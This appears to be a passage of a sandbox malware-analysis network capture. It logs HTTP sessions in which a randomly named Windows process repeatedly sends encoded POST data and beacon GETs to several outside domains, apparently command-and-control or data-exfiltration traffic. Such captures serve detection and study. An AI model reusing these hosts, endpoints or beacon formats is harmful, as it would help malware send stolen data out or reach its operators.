User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Timestamp: Dec 4, 2024 15:33:40.669245958 CET
Bytes transferred: 673
Direction: IN
Data:
HTTP/1.1 404 Not Found
Date: Wed, 04 Dec 2024 14:33:40 GMT
Server: Apache
Content-Length: 514
Connection: close
Content-Type: text/html; charset=utf-8
Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>


Session ID: 29
Source IP: 192.168.2.7
Source Port: 50001
Destination IP: 8.223.59.213
Destination Port: 80
PID: 7000
Process: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
Timestamp: Dec 4, 2024 15:33:47.365998983 CET
Bytes transferred: 753
Direction: OUT
Data:
POST /3pje/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Host: www.hwbzfdtn.tokyo
Origin: http://www.hwbzfdtn.tokyo
Content-Length: 219
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.hwbzfdtn.tokyo/3pje/
User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Data Ascii: GhEtuH=7AR1f4UdXjZ5ooIB7x766ZVbZ+1V5hfK+jlkL1lvCyDc74KTDwtR1E+lTaSN6YiSYQQv1rpzgeA2APw4m7JJZGh2bq9xF6dtVMXk4q1AY1tTA9/eP+z6tqoEGFuCJYvGvtXdyo7XzUVIIx0ysnAgWy/3TpmFbf+CvFQkMJV1hQAy0Tkx2Op64aWfzldDm2CBuoeWZIAsQWgmGvV9cg==


Session ID: 30
Source IP: 192.168.2.7
Source Port: 50002
Destination IP: 8.223.59.213
Destination Port: 80
PID: 7000
Process: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
Timestamp: Dec 4, 2024 15:33:50.035377026 CET
Bytes transferred: 773
Direction: OUT
Data:
POST /3pje/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Host: www.hwbzfdtn.tokyo
Origin: http://www.hwbzfdtn.tokyo
Content-Length: 239
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.hwbzfdtn.tokyo/3pje/
User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Data Ascii: GhEtuH=7AR1f4UdXjZ5oIYB5WX6yZVaWe1VzBfO+jpkL0woCAXc7aSTA1ZR2E+lLKSInIivYQc41qFzgYs2AN44mMdGYWh0UK9zKadtVMXk4qgdYxJTHJ7ePcX7uqoLSVuCfYv4vtXzypmAzWdII0Iysy8nYC/xdJnzet7K3VdfCqdLpR8jxllTsslWmLuk3n51xQf0spaOUq0NPhFML905KZAbrC5jWfCtoT3dmcwaSX0=
Timestamp: Dec 4, 2024 15:33:51.618423939 CET
Bytes transferred: 508
Direction: IN
Data:
HTTP/1.1 200
Server: nginx
Date: Wed, 04 Dec 2024 14:33:51 GMT
Content-Type: application/json;charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: http://www.hwbzfdtn.tokyo
Access-Control-Allow-Credentials: true
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 33 70 6a 65 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: 54{"msg":"请求访问：/3pje/，认证失败，无法访问系统资源","code":401}0


Session ID: 31
Source IP: 192.168.2.7
Source Port: 50003
Destination IP: 8.223.59.213
Destination Port: 80
PID: 7000
Process: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
Timestamp: Dec 4, 2024 15:33:52.738652945 CET
Bytes transferred: 1786
Direction: OUT
Data:
POST /3pje/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Host: www.hwbzfdtn.tokyo
Origin: http://www.hwbzfdtn.tokyo
Content-Length: 1251
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.hwbzfdtn.tokyo/3pje/
User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Timestamp: Dec 4, 2024 15:33:54.331841946 CET
Bytes transferred: 508
Direction: IN
Data:
HTTP/1.1 200
Server: nginx
Date: Wed, 04 Dec 2024 14:33:54 GMT
Content-Type: application/json;charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: http://www.hwbzfdtn.tokyo
Access-Control-Allow-Credentials: true
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 33 70 6a 65 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: 54{"msg":"请求访问：/3pje/，认证失败，无法访问系统资源","code":401}0


Session ID: 32
Source IP: 192.168.2.7
Source Port: 50004
Destination IP: 8.223.59.213
Destination Port: 80
PID: 7000
Process: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
Timestamp: Dec 4, 2024 15:33:55.389847994 CET
Bytes transferred: 492
Direction: OUT
Data:
GET /3pje/?GhEtuH=2C5VcNcdbhFphNwA7gbLu4o0N5MJpmvs9kBgNmJqElzxjYuhWh9e33X7OaqqoaP4YBwO1oY27LwLJ/gdnK1kbQ0HR4V8Mf1XFtPz1ewRRkQFG47cZvjpm9IGNViEPL31rvHero6O+mYM&9hy=gvrDS8U8OP HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Host: www.hwbzfdtn.tokyo
Connection: close
User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Timestamp: Dec 4, 2024 15:33:56.924983978 CET
Bytes transferred: 427
Direction: IN
Data:
HTTP/1.1 200
Server: nginx
Date: Wed, 04 Dec 2024 14:33:56 GMT
Content-Type: application/json;charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Cache: MISS
Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 33 70 6a 65 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: 54{"msg":"请求访问：/3pje/，认证失败，无法访问系统资源","code":401}0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.7 | 50005 | 54.176.168.58 | 80 | 7000 | C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe

Timestamp | Bytes transferred | Direction | Data
Dec 4, 2024 15:34:02.627599001 CET | 762 | OUT | POST /zgqx/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Host: www.129glenforest.com
Origin: http://www.129glenforest.com
Content-Length: 219
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.129glenforest.com/zgqx/
User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Data Ascii: GhEtuH=ir//h7CfUQUwpaXGGIVcdUjVW8+MhxHHwK9b5Wnr6655Owj2SHkb+8EU0ooXedcMa/l4yceRtaJTraI42zCQyLQjWPOszCdg/UYBRhKSpf9tLrSK0jhJ0BnZNpr5uObYKlIHtZcq+BovpzTc0MEmj7z+W5JQ6+97h1wmIA9G2bHfLdU3Xe8GvSIXf3mOAXc/lfc1gZ3n3CoVrZymoQ==
Dec 4, 2024 15:34:03.967509031 CET | 1236 | IN | HTTP/1.1 200
Date: Wed, 04 Dec 2024 14:34:03 GMT
Content-Type: text/html;charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: AWSALB=WVuwpbq+anIydnWZDpHI0cdP3fmqg422y24nInR6UeYZXsAVfyAyXrYWvjj4mBOcUWHehd4rYGLsEOxJ/fExcaie5+oiJQPMU5jkrYX93XkB3DrzBf85S8JiIIRJ; Expires=Wed, 11 Dec 2024 14:34:03 GMT; Path=/
Set-Cookie: AWSALBCORS=WVuwpbq+anIydnWZDpHI0cdP3fmqg422y24nInR6UeYZXsAVfyAyXrYWvjj4mBOcUWHehd4rYGLsEOxJ/fExcaie5+oiJQPMU5jkrYX93XkB3DrzBf85S8JiIIRJ; Expires=Wed, 11 Dec 2024 14:34:03 GMT; Path=/; SameSite=None
Server: nginx/1.26.2
Set-Cookie: cfid=97c9321a-e0b7-4bb9-bc38-7048ebfe16fd;Path=/;Expires=Thu, 03-Dec-2054 22:25:33 UTC;HttpOnly
Set-Cookie: cftoken=0;Path=/;Expires=Thu, 03-Dec-2054 22:25:33 UTC;HttpOnly
Set-Cookie: CF_CLIENT_CRIBFLYER_LV=1733322843771;Path=/;Expires=Tue, 04-Mar-2025 14:34:03 UTC;HttpOnly
Set-Cookie: CF_CLIENT_CRIBFLYER_TC=1733322843771;Path=/;Expires=Tue, 04-Mar-2025 14:34:03 UTC;HttpOnly
Set-Cookie: CF_CLIENT_CRIBFLYER_HC=2;Path=/;Expires=Tue, 04-Mar-2025 14:34:03 UTC;HttpOnly
Content-Encoding: gzip
Data Raw: (gzip-compressed chunked body, first chunk 0x28e bytes; binary omitted)
Dec 4, 2024 15:34:03.967650890 CET | 505 | IN | Data Raw: (continuation of the gzip body; binary omitted)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.7 | 50006 | 54.176.168.58 | 80 | 7000 | C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe

Timestamp | Bytes transferred | Direction | Data
Dec 4, 2024 15:34:05.327066898 CET | 782 | OUT | POST /zgqx/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Host: www.129glenforest.com
Origin: http://www.129glenforest.com
Content-Length: 239
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.129glenforest.com/zgqx/
User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Data Ascii: GhEtuH=ir//h7CfUQUwp5PGFvBcMkjWPc+M0hHDwKBb5Xiu6od5PRT2RDIb98EU8IoWadcba/4FyeKRtbpTrb443FKX0bQlDfOU3Cdg/UYBRhu0peVtLbiKlyhI1BnaKpr5lubcKlJStchP+Hsvp23c0+sn2rzkZZIfyMARpkcjHzlJ/se0KrVVN8wqxDwsb1C4XxBKneYtt7DGo1N/mLTi+n0S6O4whdaciugUTWmk/a8=
Dec 4, 2024 15:34:06.531832933 CET | 1236 | IN | HTTP/1.1 200
Date: Wed, 04 Dec 2024 14:34:06 GMT
Content-Type: text/html;charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: AWSALB=RITJ5wlLqV+8CYQU5+UhyCpx5G5EfiSjCYGTd9CVN+aCcFI2aApBFFlhXkRC+Oa78AagEx6TxqxyVWYWRLi/0GVWg3FQLMVVfM2ulmu8RShpvQZlwZ//LsBRhUWJ; Expires=Wed, 11 Dec 2024 14:34:06 GMT; Path=/
Set-Cookie: AWSALBCORS=RITJ5wlLqV+8CYQU5+UhyCpx5G5EfiSjCYGTd9CVN+aCcFI2aApBFFlhXkRC+Oa78AagEx6TxqxyVWYWRLi/0GVWg3FQLMVVfM2ulmu8RShpvQZlwZ//LsBRhUWJ; Expires=Wed, 11 Dec 2024 14:34:06 GMT; Path=/; SameSite=None
Server: nginx/1.26.2
Set-Cookie: cfid=813ce0e1-52a8-46b6-8658-76fa7f88bf8f;Path=/;Expires=Thu, 03-Dec-2054 22:25:36 UTC;HttpOnly
Set-Cookie: cftoken=0;Path=/;Expires=Thu, 03-Dec-2054 22:25:36 UTC;HttpOnly
Set-Cookie: CF_CLIENT_CRIBFLYER_LV=1733322846326;Path=/;Expires=Tue, 04-Mar-2025 14:34:06 UTC;HttpOnly
Set-Cookie: CF_CLIENT_CRIBFLYER_TC=1733322846326;Path=/;Expires=Tue, 04-Mar-2025 14:34:06 UTC;HttpOnly
Set-Cookie: CF_CLIENT_CRIBFLYER_HC=2;Path=/;Expires=Tue, 04-Mar-2025 14:34:06 UTC;HttpOnly
Content-Encoding: gzip
Data Raw: (gzip-compressed chunked body, first chunk 0x28e bytes; binary omitted)
Dec 4, 2024 15:34:06.532017946 CET | 505 | IN | Data Raw: (continuation of the gzip body; binary omitted)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.7 | 50007 | 54.176.168.58 | 80 | 7000 | C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe

Timestamp | Bytes transferred | Direction | Data
Dec 4, 2024 15:34:08.160809040 CET | 1795 | OUT | POST /zgqx/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Host: www.129glenforest.com
Origin: http://www.129glenforest.com
Content-Length: 1251
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.129glenforest.com/zgqx/
User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Data Ascii: GhEtuH= [TRUNCATED]
Dec 4, 2024 15:34:09.475188971 CET | 1236 | IN | HTTP/1.1 200
Date: Wed, 04 Dec 2024 14:34:09 GMT
Content-Type: text/html;charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: AWSALB=L36BEEXH4YLE03FevxgMcJqV6qbPwTddUCe269sfRTBljzEDcIkIH9uK1Oe8SzJJH/V+vU3g4jrJLDyib/raNxbxSw001vDcbJG7s9BnUwVbI83k5akG+165RbzV; Expires=Wed, 11 Dec 2024 14:34:09 GMT; Path=/
Set-Cookie: AWSALBCORS=L36BEEXH4YLE03FevxgMcJqV6qbPwTddUCe269sfRTBljzEDcIkIH9uK1Oe8SzJJH/V+vU3g4jrJLDyib/raNxbxSw001vDcbJG7s9BnUwVbI83k5akG+165RbzV; Expires=Wed, 11 Dec 2024 14:34:09 GMT; Path=/; SameSite=None
Server: nginx/1.26.2
Set-Cookie: cfid=bb21b2f0-6053-4561-91bf-67684f1a9a8e;Path=/;Expires=Thu, 03-Dec-2054 22:25:39 UTC;HttpOnly
Set-Cookie: cftoken=0;Path=/;Expires=Thu, 03-Dec-2054 22:25:39 UTC;HttpOnly
Set-Cookie: CF_CLIENT_CRIBFLYER_LV=1733322849276;Path=/;Expires=Tue, 04-Mar-2025 14:34:09 UTC;HttpOnly
Set-Cookie: CF_CLIENT_CRIBFLYER_TC=1733322849276;Path=/;Expires=Tue, 04-Mar-2025 14:34:09 UTC;HttpOnly
Set-Cookie: CF_CLIENT_CRIBFLYER_HC=2;Path=/;Expires=Tue, 04-Mar-2025 14:34:09 UTC;HttpOnly
Content-Encoding: gzip
Data Raw: (gzip-compressed chunked body, first chunk 0x28e bytes; binary omitted)
Dec 4, 2024 15:34:09.475289106 CET | 505 | IN | Data Raw: (continuation of the gzip body; binary omitted)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.7 | 50008 | 54.176.168.58 | 80 | 7000 | C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe

Timestamp | Bytes transferred | Direction | Data
Dec 4, 2024 15:34:10.830578089 CET | 495 | OUT | GET /zgqx/?GhEtuH=vpXfiL7xAiwEgavhBJ5+dVbyToiv3Ajc9/9k/kyom/IPODfyHTsY9MNM1oIIcM9OOPgjl+yjy+dwg4YL1U+Z+aAXCKq38CY4+hImZkjI6IAgM5qe0htR9lzNJYnqwffYKnUXs/x3ziJB&9hy=gvrDS8U8OP HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Host: www.129glenforest.com
Connection: close
User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Dec 4, 2024 15:34:12.095557928 CET | 1236 | IN | HTTP/1.1 200
Date: Wed, 04 Dec 2024 14:34:11 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 1192
Connection: close
Set-Cookie: AWSALB=UXq3DjXKs5Bz4ncpkIwZeNtA+L4FnJA8E1+oQyvwB9Z924uCuFID5mbF31FVTHK8K372PaFxpcY82FE33UawZd5QbFlaf/Nf96Feu8bMDdwbyeccZ5K37gKs9fU4; Expires=Wed, 11 Dec 2024 14:34:11 GMT; Path=/
Set-Cookie: AWSALBCORS=UXq3DjXKs5Bz4ncpkIwZeNtA+L4FnJA8E1+oQyvwB9Z924uCuFID5mbF31FVTHK8K372PaFxpcY82FE33UawZd5QbFlaf/Nf96Feu8bMDdwbyeccZ5K37gKs9fU4; Expires=Wed, 11 Dec 2024 14:34:11 GMT; Path=/; SameSite=None
Server: nginx/1.26.2
Set-Cookie: cfid=a3f05cf6-d29c-4032-95cb-b458eff8f08b;Path=/;Expires=Thu, 03-Dec-2054 22:25:41 UTC;HttpOnly
Set-Cookie: cftoken=0;Path=/;Expires=Thu, 03-Dec-2054 22:25:41 UTC;HttpOnly
Set-Cookie: CF_CLIENT_CRIBFLYER_LV=1733322851898;Path=/;Expires=Tue, 04-Mar-2025 14:34:11 UTC;HttpOnly
Set-Cookie: CF_CLIENT_CRIBFLYER_TC=1733322851898;Path=/;Expires=Tue, 04-Mar-2025 14:34:11 UTC;HttpOnly
Set-Cookie: CF_CLIENT_CRIBFLYER_HC=2;Path=/;Expires=Tue, 04-Mar-2025 14:34:11 UTC;HttpOnly
Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>129 Glenforest Rd.</title><meta name="viewport" content="width=device-width, initial-scale=1.0"><link rel="stylesheet"
Dec 4, 2024 15:34:12.095763922 CET | 1001 | IN | (continuation of the HTML body)
Data Ascii: href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700"><link rel="stylesheet" href="/plugins/bootstrap-4.6.2/css/bootstrap.min.css"><link href="/views/themes/_common/css/property-lead.css?v=1.0.1" rel="stylesheet"></head>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                37192.168.2.750009199.59.243.227807000C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 4, 2024 15:34:18.005403996 CET759OUTPOST /pvrm/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.dating-ml-es.xyz
                                                                                Origin: http://www.dating-ml-es.xyz
                                                                                Content-Length: 219
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.dating-ml-es.xyz/pvrm/
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Data Raw: 47 68 45 74 75 48 3d 6e 2f 39 30 36 63 74 31 77 52 54 63 71 34 32 64 45 79 6c 4d 61 6a 6f 7a 74 6f 4c 67 6f 35 61 41 39 36 67 75 30 42 7a 50 4e 4e 36 47 73 31 43 70 68 36 73 72 51 6e 57 35 71 74 43 6e 52 2f 68 48 45 4b 4b 69 53 76 33 79 55 53 43 79 43 32 63 77 51 33 69 58 55 6a 65 48 6a 66 4a 7a 63 57 58 58 45 63 47 2f 6c 46 30 46 4f 66 4f 70 57 33 68 71 38 68 6b 61 6d 7a 49 45 44 70 6e 67 72 32 62 44 6f 46 73 54 34 67 71 55 66 6c 56 50 48 63 43 59 66 75 59 51 6c 38 45 6e 45 49 31 34 77 44 31 66 76 66 53 31 49 73 35 70 39 6e 66 64 4f 78 59 69 45 2f 35 50 61 4d 68 52 79 31 5a 6f 6e 59 4c 66 6a 65 4d 4d 6e 6e 58 44 59 61 56 53 67 63 54 59 79 41 3d 3d
                                                                                Data Ascii: GhEtuH=n/906ct1wRTcq42dEylMajoztoLgo5aA96gu0BzPNN6Gs1Cph6srQnW5qtCnR/hHEKKiSv3yUSCyC2cwQ3iXUjeHjfJzcWXXEcG/lF0FOfOpW3hq8hkamzIEDpngr2bDoFsT4gqUflVPHcCYfuYQl8EnEI14wD1fvfS1Is5p9nfdOxYiE/5PaMhRy1ZonYLfjeMMnnXDYaVSgcTYyA==
                                                                                Dec 4, 2024 15:34:19.106170893 CET1236INHTTP/1.1 200 OK
                                                                                date: Wed, 04 Dec 2024 14:34:18 GMT
                                                                                content-type: text/html; charset=utf-8
                                                                                content-length: 1130
                                                                                x-request-id: d3337716-89da-4ce0-ad63-950874fa6a31
                                                                                cache-control: no-store, max-age=0
                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                vary: sec-ch-prefers-color-scheme
                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_qHQTHtx6xrYiTGxeSXicSE8nWIEKKINAfKcQtJ2pC+FcEEllmXW1tsgavK9OhxYIqk+99nB+5EHqy4sBzTYNqw==
                                                                                set-cookie: parking_session=d3337716-89da-4ce0-ad63-950874fa6a31; expires=Wed, 04 Dec 2024 14:49:18 GMT; path=/
                                                                                connection: close
                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 71 48 51 54 48 74 78 36 78 72 59 69 54 47 78 65 53 58 69 63 53 45 38 6e 57 49 45 4b 4b 49 4e 41 66 4b 63 51 74 4a 32 70 43 2b 46 63 45 45 6c 6c 6d 58 57 31 74 73 67 61 76 4b 39 4f 68 78 59 49 71 6b 2b 39 39 6e 42 2b 35 45 48 71 79 34 73 42 7a 54 59 4e 71 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_qHQTHtx6xrYiTGxeSXicSE8nWIEKKINAfKcQtJ2pC+FcEEllmXW1tsgavK9OhxYIqk+99nB+5EHqy4sBzTYNqw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Dec 4, 2024 15:34:19.106319904 CET | 583 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZDMzMzc3MTYtODlkYS00Y2UwLWFkNjMtOTUwODc0ZmE2YTMxIiwicGFnZV90aW1lIjoxNzMzMzIyOD


Session ID: 38 | Source IP: 192.168.2.7 | Source Port: 50010 | Destination IP: 199.59.243.227 | Destination Port: 80 | PID: 7000 | Process: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2024 15:34:20.732547045 CET | 779 | OUT | POST /pvrm/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Host: www.dating-ml-es.xyz
Origin: http://www.dating-ml-es.xyz
Content-Length: 239
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.dating-ml-es.xyz/pvrm/
